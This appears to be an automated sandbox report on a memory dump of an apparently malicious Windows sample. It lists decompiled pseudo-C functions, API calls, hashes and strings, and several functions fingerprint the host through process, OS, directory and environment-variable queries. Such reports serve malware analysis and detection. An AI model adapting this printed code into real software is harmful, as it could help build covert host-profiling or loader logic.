    • Instruction ID: e994a8f6548d371bc85e6c93dcaae18fce46a9f8af42e998dc2b6809d0add84e
    • Opcode Fuzzy Hash: fd0893acc5b93fe0ffddc8dc8951f99c3798706946d6c9f53fe76d78a0d8b5f0
    • Instruction Fuzzy Hash: 54514AB1A00208EFDB18DF99D949E9EFBB8EF04700F59906AF604AB2A4C371D941DB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0360F9CA(void* __edx) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				intOrPtr _t26;
    				char _t27;
    				intOrPtr _t29;
    				void* _t31;
    				void* _t36;
    				char _t38;
    				intOrPtr _t39;
    				char _t42;
    				intOrPtr _t51;
    				intOrPtr _t52;
    				intOrPtr* _t63;
    				intOrPtr _t66;
    				char* _t67;
    				intOrPtr _t69;
    				char _t78;
    				void* _t81;
    				void* _t82;
    
    				_t26 =  *0x361e654; // 0x530fb08
    				_t27 = E036085EA( *((intOrPtr*)(_t26 + 4))); // executed
    				_v12 = _t27;
    				if(_t27 != 0) {
    					_t63 =  *0x361e654; // 0x530fb08
    					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
    						E036086C7(_t27,  *_t63, 0x400);
    						_v8 = 0;
    						_t36 = E0360109A(_t63, 0x34a);
    						_t66 =  *0x361e688; // 0x33f0000
    						_t72 =  !=  ? 0x67d : 0x615;
    						_t38 = E036095C7(_t66,  !=  ? 0x67d : 0x615);
    						_push(0);
    						_push(_t36);
    						_t67 = "\\";
    						_v24 = _t38;
    						_push(_t67);
    						_push(_t38);
    						_t39 =  *0x361e688; // 0x33f0000
    						_push(_t67);
    						_v20 = E036092CB(_t39 + 0x1020);
    						_t42 = E0360A68F( &_v8, _t41,  &_v8); // executed
    						_v16 = _t42;
    						E036085BB( &_v24);
    						E036085BB( &_v20);
    						_t73 = _v16;
    						_t82 = _t81 + 0x3c;
    						_t69 = _v8;
    						if(_v16 != 0 && _t69 > 0x400) {
    							_t51 =  *0x361e654; // 0x530fb08
    							_t52 =  *((intOrPtr*)(_t51 + 4));
    							_t53 =  <  ? _t69 : _t52;
    							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
    							E036086C7(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
    							_t69 = _v8;
    							_t82 = _t82 + 0xc;
    						}
    						E03608600( &_v16, _t69); // executed
    						E03608600( &_v20, 0xfffffffe);
    						_t27 = _v12;
    						_t81 = _t82 + 0x10;
    						_t63 =  *0x361e654; // 0x530fb08
    					}
    					_t78 = 0;
    					while(1) {
    						_t29 =  *0x361e688; // 0x33f0000
    						_t31 = E0360A763(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
    						_t81 = _t81 + 0xc;
    						if(_t31 >= 0) {
    							break;
    						}
    						Sleep(1);
    						_t78 = _t78 + 1;
    						if(_t78 < 0x2710) {
    							_t27 = _v12;
    							_t63 =  *0x361e654; // 0x530fb08
    							continue;
    						}
    						break;
    					}
    					E03608600( &_v12, 0);
    				}
    				return 0;
    			}


























    APIs
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0360F8C0,?,?,?,0360FCC4,00000000), ref: 0360FAF7
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateHeapSleep
    • String ID:
    • API String ID: 4201116106-0
    • Opcode ID: efb7dcf9d3419fad846989e8ac4ab6d85a029b1ef6e9568fe262ef957e739baf
    • Instruction ID: e37cb5e54fc5689bf4ccd7e7b0dee612bb031bc5638ac9f928a46cb7e5aee33d
    • Opcode Fuzzy Hash: efb7dcf9d3419fad846989e8ac4ab6d85a029b1ef6e9568fe262ef957e739baf
    • Instruction Fuzzy Hash: 8341A575A00208AFDB08EBA4DD86EAFB7BDEF44300F58446DE901DB285DB35D911CB95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E03608955(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
    				char _v8;
    				WCHAR* _v12;
    				signed int _v16;
    				WCHAR* _v20;
    				short _t30;
    				short _t33;
    				intOrPtr _t38;
    				intOrPtr _t43;
    				intOrPtr _t45;
    				short _t49;
    				void* _t52;
    				char _t71;
    				WCHAR* _t72;
    
    				_v16 = _v16 & 0x00000000;
    				_t71 = 0;
    				_v12 = __ecx;
    				_t49 = __edx;
    				_v8 = 0;
    				_t72 = E036085EA(0x448);
    				_v20 = _t72;
    				_pop(_t52);
    				if(_t72 != 0) {
    					_t72[0x21a] = __edx;
    					_t72[0x21c] = _a8;
    					lstrcpynW(_t72, _v12, 0x200);
    					if(_t49 != 1) {
    						_t30 = E036085EA(0x100000);
    						_t72[0x212] = _t30;
    						if(_t30 != 0) {
    							_t69 = _a4;
    							_t72[0x216] = 0x100000;
    							if(_a4 != 0) {
    								E036087D0(_t72, _t69);
    							}
    							L16:
    							return _t72;
    						}
    						L7:
    						if(_t71 != 0) {
    							E03608600( &_v8, 0);
    						}
    						L9:
    						_t33 = _t72[0x218];
    						if(_t33 != 0) {
    							_t38 =  *0x361e684; // 0x530f6c8
    							 *((intOrPtr*)(_t38 + 0x30))(_t33);
    						}
    						_t73 =  &(_t72[0x212]);
    						if(_t72[0x212] != 0) {
    							E03608600(_t73, 0);
    						}
    						E03608600( &_v20, 0);
    						goto L1;
    					}
    					_t43 = E0360A68F(_t52, _v12,  &_v16); // executed
    					_t71 = _t43;
    					_v8 = _t71;
    					if(_t71 == 0) {
    						goto L9;
    					}
    					if(E036087FB(_t72, _t71, _v16, _a4) < 0) {
    						goto L7;
    					} else {
    						_t45 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
    						_t72[0x218] = _t72[0x218] & 0x00000000;
    						E03608600( &_v8, 0);
    						goto L16;
    					}
    				}
    				L1:
    				return 0;
    			}

















    APIs
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000000), ref: 0360899F
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateHeaplstrcpyn
    • String ID:
    • API String ID: 680773602-0
    • Opcode ID: 96e0e76a401f1bcd441e737d73479b4918e5bc4a275bbc9705eb491bead0d40d
    • Instruction ID: 4cb9f2581fdd8e2e7fea4c7aa1182d351082eb6cb757d22a9c48b7b3ff9f9176
    • Opcode Fuzzy Hash: 96e0e76a401f1bcd441e737d73479b4918e5bc4a275bbc9705eb491bead0d40d
    • Instruction Fuzzy Hash: 6D31C876A14705AFDB19EBA8D842B9FB7E9EF40620F24041EE505AB2C0DB70A9008B5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0360E2D1(void* __fp0, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v32;
    				char _v544;
    				signed int _t40;
    				intOrPtr _t41;
    				intOrPtr _t48;
    				void* _t52;
    				intOrPtr _t58;
    				void* _t65;
    				intOrPtr _t66;
    				void* _t70;
    				signed int _t73;
    				void* _t75;
    				void* _t77;
    
    				_t77 = __fp0;
    				_v20 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t66 =  *0x361e6b4; // 0x530f870, executed
    				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
    				if(_t40 == 0) {
    					_t73 = 0;
    					if(_v20 <= 0) {
    						L9:
    						_t41 =  *0x361e6b4; // 0x530f870
    						 *((intOrPtr*)(_t41 + 0xc))(_v8);
    						return 0;
    					}
    					do {
    						_v16 = 0;
    						_v12 = 0;
    						_t48 =  *0x361e68c; // 0x530f890
    						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
    						_t52 = E036085EA(_v16 + 1); // executed
    						_t70 = _t52;
    						if(_t70 != 0) {
    							_v12 = 0x200;
    							_push( &_v32);
    							_push( &_v12);
    							_push( &_v544);
    							_push( &_v16);
    							_push(_t70);
    							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
    							_t58 =  *0x361e68c; // 0x530f890
    							_push(0);
    							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
    								E03604906(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
    								_t75 = _t75 + 0xc;
    								Sleep(0xa);
    							}
    						}
    						_t73 = _t73 + 1;
    					} while (_t73 < _v20);
    					goto L9;
    				}
    				return _t40 | 0xffffffff;
    			}























    APIs
    • Sleep.KERNELBASE(0000000A), ref: 0360E39F
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: 4734dd78835c902b1c0a2b2d58dc1b039c9b4003e18d11cd3f979473f8af9d51
    • Instruction ID: 84920d1f08f1ecf5a428b396c4709d0c9dde0d139e4c190b427cce0a0524bdb8
    • Opcode Fuzzy Hash: 4734dd78835c902b1c0a2b2d58dc1b039c9b4003e18d11cd3f979473f8af9d51
    • Instruction Fuzzy Hash: 393118B5900218BFDB15DFA4CD85EEFBBBCEB04310F1445AAB911E7295D7319A018BA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360A3D3(signed int __ecx, intOrPtr* __edx, void* __fp0) {
    				intOrPtr _v8;
    				signed int _v16;
    				char _v20;
    				void* _t24;
    				char _t25;
    				signed int _t30;
    				intOrPtr* _t45;
    				signed int _t46;
    				void* _t47;
    				void* _t54;
    
    				_t54 = __fp0;
    				_t45 = __edx;
    				_t46 = 0;
    				_t30 = __ecx;
    				if( *__edx > 0) {
    					do {
    						_t24 = E03609EB6(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
    						if(_t24 == 0) {
    							_t25 = E0360972F( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
    							_v8 = _t25;
    							if(_t25 != 0) {
    								L6:
    								_v16 = _v16 & 0x00000000;
    								_v20 = _t25;
    								E0360A091(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
    								_t47 = _t47 + 0xc;
    							} else {
    								if(GetLastError() != 0xd) {
    									_t25 = _v8;
    									goto L6;
    								} else {
    									E03609F2E( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
    								}
    							}
    						}
    						_t46 = _t46 + 1;
    					} while (_t46 <  *_t45);
    				}
    				return 0;
    			}














    APIs
      • Part of subcall function 0360972F: SetLastError.KERNEL32(0000000D,00000000,00000000,0360A327,00000000,00000000,?,?,?,03605AC9), ref: 03609768
    • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,03604C61,?,?,00000000), ref: 0360A40A
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 1c0ca0781d3b5682f6c5420670fa75c580bdd44325e75e258c00b314e263d1c3
    • Instruction ID: 67abe879519af5c143b48d1491e64d05b6c8269546f853b474b65e045b43ff59
    • Opcode Fuzzy Hash: 1c0ca0781d3b5682f6c5420670fa75c580bdd44325e75e258c00b314e263d1c3
    • Instruction Fuzzy Hash: 9A11A57DB00206ABC718DFA8C58695FF3AAFB84354F608169C4029B391D730ED01CBD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E03605D65(void* __eflags) {
    				char _v44;
    				intOrPtr _t7;
    				intOrPtr _t10;
    				void* _t11;
    				WCHAR* _t12;
    				WCHAR* _t13;
    				WCHAR* _t14;
    				intOrPtr _t15;
    				intOrPtr _t19;
    				intOrPtr _t22;
    				void* _t27;
    				WCHAR* _t28;
    
    				_t7 =  *0x361e688; // 0x33f0000
    				E0360A853( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
    				_t10 =  *0x361e684; // 0x530f6c8
    				_t28 = 2;
    				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
    				if(_t11 == 0) {
    					_t22 =  *0x361e688; // 0x33f0000
    					_t12 = E0360595C( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
    					 *0x361e6ac = _t12;
    					__eflags = _t12;
    					if(_t12 != 0) {
    						_t14 = E03609EA1();
    						__eflags = _t14;
    						if(_t14 == 0) {
    							_t28 = 0;
    							__eflags = 0;
    						} else {
    							_t15 =  *0x361e688; // 0x33f0000
    							lstrcmpiW(_t15 + 0x228, _t14);
    							asm("sbb esi, esi");
    							_t28 = _t28 + 1;
    						}
    					}
    					_t13 = _t28;
    				} else {
    					_t19 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t19 + 0x30))(_t11);
    					_t13 = 3;
    				}
    				return _t13;
    			}
















    APIs
    • lstrcmpiW.KERNEL32(033EFDD8,00000000), ref: 03605DDA
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: lstrcmpi
    • String ID:
    • API String ID: 1586166983-0
    • Opcode ID: 5c4443d53ce60e4adee54add4e31a1504d4f23379bde8f2de07264052c2379f9
    • Instruction ID: da596728bcc179a9f6d38a4d6840eabe41767c9dd95d2c8370b4a5131ae0052b
    • Opcode Fuzzy Hash: 5c4443d53ce60e4adee54add4e31a1504d4f23379bde8f2de07264052c2379f9
    • Instruction Fuzzy Hash: 9E01D4312153119FE704F7A9EC5AF97B3E8DB0A200F4D502AFA03DB2C8DA20E4118BE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E03605CD4(void* __ecx, void* __eflags, void* __fp0) {
    				void _v44;
    				signed int _t8;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t21;
    				void* _t24;
    				void* _t29;
    				void* _t35;
    
    				_t35 = __eflags;
    				_t24 = __ecx;
    				_t8 =  *0x361e688; // 0x33f0000
    				E036124A6(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
    				E036085D5();
    				E03608F5E();
    				 *0x361e780 = 0;
    				 *0x361e784 = 0;
    				 *0x361e77c = 0;
    				E03605E9E(); // executed
    				E0360CF8F(_t24);
    				_t14 =  *0x361e688; // 0x33f0000
    				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
    				_t15 =  *0x361e688; // 0x33f0000
    				E0360A853( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
    				E0360B31D( &_v44);
    				memset( &_v44, 0, 0x27);
    				E03605C0E( &_v44, __fp0);
    				_t21 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
    				return 0;
    			}












    APIs
      • Part of subcall function 036085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,03605F84), ref: 036085DE
      • Part of subcall function 0360CF8F: GetCurrentProcess.KERNEL32(?,?,033F0000,?,0360353A), ref: 0360CF9B
      • Part of subcall function 0360CF8F: GetModuleFileNameW.KERNEL32(00000000,033F1644,00000105,?,?,033F0000,?,0360353A), ref: 0360CFBC
      • Part of subcall function 0360CF8F: memset.MSVCRT ref: 0360CFED
      • Part of subcall function 0360CF8F: GetVersionExA.KERNEL32(033F0000,033F0000,?,0360353A), ref: 0360CFF8
      • Part of subcall function 0360CF8F: GetCurrentProcessId.KERNEL32(?,0360353A), ref: 0360CFFE
      • Part of subcall function 0360B31D: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,03603C8B,?,?,?,?,?,?,?,?,03603D70,00000000), ref: 0360B350
    • memset.MSVCRT ref: 03605D47
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CurrentProcessmemset$ChangeCloseCreateFileFindHeapModuleNameNotificationVersion
    • String ID:
    • API String ID: 2687588655-0
    • Opcode ID: 1d328c677ab1b4e16b5ec7c239332a2f9e9c8bbc04b27b493db559fcbdd2179b
    • Instruction ID: 9c9a073a63721636a91f5a067c5cdc7e2332e7d198413ab52361c153a73fc30a
    • Opcode Fuzzy Hash: 1d328c677ab1b4e16b5ec7c239332a2f9e9c8bbc04b27b493db559fcbdd2179b
    • Instruction Fuzzy Hash: A501D1795113008FE704FBF8D84AD8E7BE8EF09210F49106EE905AF259DB71D010DBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 86%
    			E0360D02A(void* __fp0) {
    				char _v8;
    				char _v12;
    				char _v16;
    				struct _SYSTEM_INFO _v52;
    				char _v180;
    				char _v692;
    				char _v704;
    				char _v2680;
    				void* __esi;
    				struct _OSVERSIONINFOA* _t81;
    				intOrPtr _t83;
    				void* _t84;
    				long _t86;
    				intOrPtr* _t88;
    				intOrPtr _t90;
    				intOrPtr _t95;
    				intOrPtr _t97;
    				void* _t98;
    				intOrPtr _t103;
    				char* _t105;
    				void* _t108;
    				char _t115;
    				signed int _t117;
    				char _t119;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t130;
    				intOrPtr _t134;
    				intOrPtr _t147;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t154;
    				signed int _t159;
    				struct HINSTANCE__* _t162;
    				short* _t164;
    				intOrPtr _t167;
    				WCHAR* _t168;
    				char* _t169;
    				intOrPtr _t181;
    				intOrPtr _t200;
    				void* _t215;
    				char _t218;
    				void* _t219;
    				char* _t220;
    				struct _OSVERSIONINFOA* _t222;
    				void* _t223;
    				int* _t224;
    				void* _t241;
    
    				_t241 = __fp0;
    				_t162 =  *0x361e69c; // 0x10000000
    				_t81 = E036085EA(0x1ac4);
    				_t222 = _t81;
    				if(_t222 == 0) {
    					return _t81;
    				}
    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
    				_t83 =  *0x361e684; // 0x530f6c8
    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
    				_t3 = _t222 + 0x648; // 0x648
    				E0361230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
    				_t5 = _t222 + 0x1644; // 0x1644
    				_t216 = _t5;
    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
    				_t227 = _t86;
    				if(_t86 != 0) {
    					 *((intOrPtr*)(_t222 + 0x1854)) = E03608FA4(_t216, _t227);
    				}
    				GetCurrentProcess();
    				_t88 = E0360B9EB();
    				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
    				_t178 =  *_t88;
    				if(E0360BB73( *_t88) == 0) {
    					_t90 = E0360BA48(_t178, _t222);
    					__eflags = _t90;
    					_t181 = (0 | _t90 > 0x00000000) + 1;
    					__eflags = _t181;
    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
    				} else {
    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
    				}
    				_t12 = _t222 + 0x220; // 0x220
    				 *((intOrPtr*)(_t222 + 0x218)) = E0360E3FC(_t12);
    				 *((intOrPtr*)(_t222 + 0x21c)) = E0360E3C1(_t12);
    				_push( &_v16);
    				 *(_t222 + 0x224) = _t162;
    				_push( &_v8);
    				_v12 = 0x80;
    				_push( &_v692);
    				_v8 = 0x100;
    				_push( &_v12);
    				_t22 = _t222 + 0x114; // 0x114
    				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
    				_t95 =  *0x361e68c; // 0x530f890
    				_push(0);
    				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
    					GetLastError();
    				}
    				_t97 =  *0x361e694; // 0x530f820
    				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
    				_t26 = _t222 + 0x228; // 0x228
    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
    				GetLastError();
    				_t31 = _t222 + 0x228; // 0x228
    				 *((intOrPtr*)(_t222 + 0x434)) = E03608FA4(_t31, _t98);
    				_t34 = _t222 + 0x114; // 0x114
    				_t103 = E0360B78E(_t34,  &_v692);
    				_t35 = _t222 + 0xb0; // 0xb0
    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
    				_push(_t35);
    				E0360B663(_t103, _t35, _t98, _t241);
    				_t37 = _t222 + 0xb0; // 0xb0
    				_t105 = _t37;
    				_t38 = _t222 + 0xd0; // 0xd0
    				_t164 = _t38;
    				if(_t105 != 0) {
    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
    					if(_t159 > 0) {
    						_t164[_t159] = 0;
    					}
    				}
    				_t41 = _t222 + 0x438; // 0x438
    				_t42 = _t222 + 0x228; // 0x228
    				E03608FBE(_t42, _t41);
    				_t43 = _t222 + 0xb0; // 0xb0
    				_t108 = E0360D40B(_t43, E0360C384(_t43), 0);
    				_t44 = _t222 + 0x100c; // 0x100c
    				E0360B870(_t108, _t44, _t241);
    				_t199 = GetCurrentProcess();
    				 *((intOrPtr*)(_t222 + 0x101c)) = E0360BBC5(_t110);
    				memset(_t222, 0, 0x9c);
    				_t224 = _t223 + 0xc;
    				_t222->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t222);
    				_t167 =  *0x361e684; // 0x530f6c8
    				_t115 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
    					_t115 = _v8;
    				}
    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
    				if(_t115 == 0) {
    					GetSystemInfo( &_v52);
    					_t117 = _v52.dwOemId & 0x0000ffff;
    				} else {
    					_t117 = 9;
    				}
    				_t54 = _t222 + 0x1020; // 0x1020
    				_t168 = _t54;
    				 *(_t222 + 0x9c) = _t117;
    				GetWindowsDirectoryW(_t168, 0x104);
    				_t119 = E036095C7(_t199, 0x10c);
    				_t200 =  *0x361e684; // 0x530f6c8
    				_t218 = _t119;
    				 *_t224 = 0x104;
    				_push( &_v704);
    				_push(_t218);
    				_v8 = _t218;
    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
    					_t154 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
    				}
    				E036085BB( &_v8);
    				_t124 =  *0x361e684; // 0x530f6c8
    				_t61 = _t222 + 0x1434; // 0x1434
    				_t219 = _t61;
    				 *_t224 = 0x209;
    				_push(_t219);
    				_push(L"USERPROFILE");
    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
    					E03609626(_t219, 0x105, L"%s\\%s", _t168);
    					_t152 =  *0x361e684; // 0x530f6c8
    					_t224 =  &(_t224[5]);
    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
    				}
    				_push(0x20a);
    				_t64 = _t222 + 0x122a; // 0x122a
    				_t169 = L"TEMP";
    				_t127 =  *0x361e684; // 0x530f6c8
    				_push(_t169);
    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
    					_t149 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
    				}
    				_push(0x40);
    				_t220 = L"SystemDrive";
    				_push( &_v180);
    				_t130 =  *0x361e684; // 0x530f6c8
    				_push(_t220);
    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
    					_t147 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
    				}
    				_v8 = 0x7f;
    				_t72 = _t222 + 0x199c; // 0x199c
    				_t134 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
    				_t75 = _t222 + 0x100c; // 0x100c
    				E0361230C(E0360D40B(_t75, E0360C384(_t75), 0),  &_v2680);
    				_t76 = _t222 + 0x1858; // 0x1858
    				E036122DE( &_v2680, _t76, 0x20);
    				_t79 = _t222 + 0x1878; // 0x1878
    				E03609013(1, _t79, 0x14, 0x1e,  &_v2680);
    				 *((intOrPtr*)(_t222 + 0x1898)) = E0360CD3E(_t79);
    				return _t222;
    			}




















































    APIs
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • GetCurrentProcessId.KERNEL32 ref: 0360D051
    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0360D08D
    • GetCurrentProcess.KERNEL32 ref: 0360D0AA
    • GetLastError.KERNEL32 ref: 0360D149
    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0360D177
    • GetLastError.KERNEL32 ref: 0360D17D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0360D1D2
    • GetCurrentProcess.KERNEL32 ref: 0360D219
    • memset.MSVCRT ref: 0360D234
    • GetVersionExA.KERNEL32(00000000), ref: 0360D23F
    • GetCurrentProcess.KERNEL32(00000100), ref: 0360D259
    • GetSystemInfo.KERNEL32(?), ref: 0360D275
    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0360D292
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
    • API String ID: 3876402152-2706916422
    • Opcode ID: cf4251c9d23e28c2d660bf6896e9091eadc84452e5ff66e1882580361ead986b
    • Instruction ID: 6507bbe6bbb28dd3dab024ccfe07d9a581d22c5c9c7134bd092c0eaf7cfbc577
    • Opcode Fuzzy Hash: cf4251c9d23e28c2d660bf6896e9091eadc84452e5ff66e1882580361ead986b
    • Instruction Fuzzy Hash: 5EB18F75600704AFD718EFB4D989FEB77E8EF08300F04496EE55ADB285EB70A5048B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E0360DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				void* _v28;
    				signed int _v32;
    				char _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				char* _v72;
    				signed short _v80;
    				signed int _v84;
    				char _v88;
    				char _v92;
    				char _v96;
    				intOrPtr _v100;
    				char _v104;
    				char _v616;
    				intOrPtr* _t159;
    				char _t165;
    				signed int _t166;
    				signed int _t173;
    				signed int _t178;
    				signed int _t186;
    				intOrPtr* _t187;
    				signed int _t188;
    				signed int _t192;
    				intOrPtr* _t193;
    				intOrPtr _t200;
    				intOrPtr* _t205;
    				signed int _t207;
    				signed int _t209;
    				intOrPtr* _t210;
    				intOrPtr _t212;
    				intOrPtr* _t213;
    				signed int _t214;
    				char _t217;
    				signed int _t218;
    				signed int _t219;
    				signed int _t230;
    				signed int _t235;
    				signed int _t242;
    				signed int _t243;
    				signed int _t244;
    				signed int _t245;
    				intOrPtr* _t247;
    				intOrPtr* _t251;
    				signed int _t252;
    				intOrPtr* _t253;
    				void* _t255;
    				intOrPtr* _t261;
    				signed int _t262;
    				signed int _t283;
    				signed int _t289;
    				char* _t298;
    				void* _t320;
    				signed int _t322;
    				intOrPtr* _t323;
    				intOrPtr _t324;
    				signed int _t327;
    				intOrPtr* _t328;
    				intOrPtr* _t329;
    
    				_v32 = _v32 & 0x00000000;
    				_v60 = _v60 & 0x00000000;
    				_v56 = __edx;
    				_v100 = __ecx;
    				_t159 = E0360D52E(__ecx);
    				_t251 = _t159;
    				_v104 = _t251;
    				if(_t251 == 0) {
    					return _t159;
    				}
    				_t320 = E036085EA(0x10);
    				_v36 = _t320;
    				_pop(_t255);
    				if(_t320 == 0) {
    					L53:
    					E03608600( &_v60, 0xfffffffe);
    					E0360D5E2( &_v104);
    					return _t320;
    				}
    				_t165 = E036095C7(_t255, 0x536);
    				 *_t328 = 0x609;
    				_v52 = _t165;
    				_t166 = E036095C7(_t255);
    				_push(0);
    				_push(_v56);
    				_v20 = _t166;
    				_push(_t166);
    				_push(_a4);
    				_t322 = E036092CB(_t165);
    				_v60 = _t322;
    				E036085BB( &_v52);
    				E036085BB( &_v20);
    				_t329 = _t328 + 0x20;
    				if(_t322 != 0) {
    					_t323 = __imp__#2;
    					_v40 =  *_t323(_t322);
    					_t173 = E036095C7(_t255, 0x9e4);
    					_v20 = _t173;
    					_v52 =  *_t323(_t173);
    					E036085BB( &_v20);
    					_t324 = _v40;
    					_t261 =  *_t251;
    					_t252 = 0;
    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
    					__eflags = _t178;
    					if(_t178 != 0) {
    						L52:
    						__imp__#6(_t324);
